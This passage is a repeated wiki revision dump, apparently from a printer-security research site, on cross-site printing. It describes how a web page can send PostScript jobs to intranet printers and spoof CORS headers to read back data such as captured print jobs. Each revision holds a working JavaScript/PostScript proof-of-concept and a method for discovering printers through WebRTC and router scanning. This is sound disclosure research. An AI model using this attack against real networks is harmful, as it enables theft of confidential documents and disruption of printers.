timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 16c7182dd761ef4b5b08a295dd82c236d80f3806 273 266 2017-01-28T16:45:21Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 65df8a7ad5bd7f67853e0ac73cd40e9f9e1de79e 266 254 2017-01-28T15:24:27Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. ---- 3a646e87f4e510f3f1ad09df2183d8a07a28190a 254 252 2017-01-28T14:28:17Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. ---- d4f47f3a2754df5d786ee8945f6cdf6ba003aa7a 252 251 2017-01-28T14:20:58Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|480px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various internet-accessible resources was compiled. If a router is 